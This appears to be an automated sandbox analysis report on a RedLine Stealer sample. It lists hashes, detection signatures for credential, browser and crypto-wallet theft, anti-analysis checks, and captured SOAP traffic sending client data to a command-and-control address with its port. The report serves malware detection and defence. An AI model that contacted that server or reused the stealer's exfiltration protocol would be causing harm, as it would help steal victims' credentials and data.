Play interactive tour

Edit tour

Analysis Report SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.25862

Overview

General Information

Sample Name:	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.25862 (renamed file extension from 25862 to exe)
Analysis ID:	356847
MD5:	a6602f490e70a0c9846906944c01b1ba
SHA1:	3864724e9136d3090cd2e7afa5ae4a348e07e0e4
SHA256:	1733a30d0e7acb953730092047086555a39f5cb2ee2549021e253cbdc931fb91
Tags:	RedLineStealer
Infos:
Most interesting Screenshot:

Detection

RedLine

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected RedLine Stealer

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Is looking for software installed on the system

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w10x64

SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe (PID: 6472 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe' MD5: A6602F490E70A0C9846906944C01B1BA)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.206836108.000000000075C000.00000004.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000003.206836108.000000000075C000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.270171901.0000000002363000.00000004.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000002.270171901.0000000002363000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.270134267.0000000002310000.00000004.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000002.270134267.0000000002310000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe PID: 6472	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe PID: 6472	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a405e.4.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a405e.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a405e.4.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a405e.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310000.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310ee8.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310ee8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a3176.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a3176.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a3176.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a3176.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.5020000.5.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.5020000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.3.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.75cdf0.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.3.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.75cdf0.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310000.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310ee8.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310ee8.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.5020000.5.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.5020000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.3.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.75cdf0.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.3.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.75cdf0.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 19 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Virustotal: Detection: 74%	Perma Link
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Metadefender: Detection: 27%	Perma Link
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	ReversingLabs: Detection: 75%

Machine Learning detection for sample

Show sources

Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files

Show sources

Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, RELOCS_STRIPPED

Binary contains paths to debug symbols

Show sources

Source:

Binary string: _.pdb source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.206836108.000000000075C000.00000004.00000001.sdmp

Networking:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 3214
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 3214
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 3214
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49728

Source: global traffic

TCP traffic: 192.168.2.3:49718 -> 45.14.13.58:3214

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"Host: 45.14.13.58:3214Content-Length: 136Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/SendClientInfo"Host: 45.14.13.58:3214Content-Length: 1109278Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/GetTasks"Host: 45.14.13.58:3214Content-Length: 1083264Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 192.0.47.59 192.0.47.59

Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.14.13.58

Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmp	String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"DivX Web Player","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"Facebook Video","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"Chrome PDF Viewer","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"Chrome PDF Plugin","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"Google Earth","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"Google Talk","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"IBMJava*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: api.ip.sb

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"Host: 45.14.13.58:3214Content-Length: 136Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	String found in binary or memory: http://45.14.13.58:3214
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	String found in binary or memory: http://45.14.13.58:3214/
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: http://45.14.13.58:32144
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270752515.0000000002796000.00000004.00000001.sdmp	String found in binary or memory: http://api.ip.sb
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270752515.0000000002796000.00000004.00000001.sdmp	String found in binary or memory: http://api.ip.sb.cdn.cloudflare.net
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp	String found in binary or memory: http://bot.whatismyipaddress.com/
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275067190.00000000058AB000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275112004.00000000058E5000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275067190.00000000058AB000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275112004.00000000058E5000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.dig
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275067190.00000000058AB000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmp	String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: http://forms.rea
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: http://go.micros
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.268740526.0000000008713000.00000004.00000001.sdmp	String found in binary or memory: http://ns.ado/1
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.256274496.0000000008701000.00000004.00000001.sdmp	String found in binary or memory: http://ns.ado/1o
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.268740526.0000000008713000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.c/g
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.256274496.0000000008701000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.c/go
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.268740526.0000000008713000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.cobj
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.256274496.0000000008701000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.cobjo
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275067190.00000000058AB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275067190.00000000058AB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.datacontract.org
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/CONTEXT.Models.Enums
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: http://service.r
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: http://support.a
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: http://support.apple.com/kb/HT203092
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/0
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/CompleteTask
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/CompleteTaskResponse
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/GetSettings
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/GetSettingsResponse
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/GetTasks
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/GetTasksResponse
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/SendClientInfo
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/SendClientInfoResponse
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp	String found in binary or memory: http://www.geoplugin.net/json.gp?ip=https://api.ip.sb/geoipsecuritywaves-exchange
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sb
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sb/geoip
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org
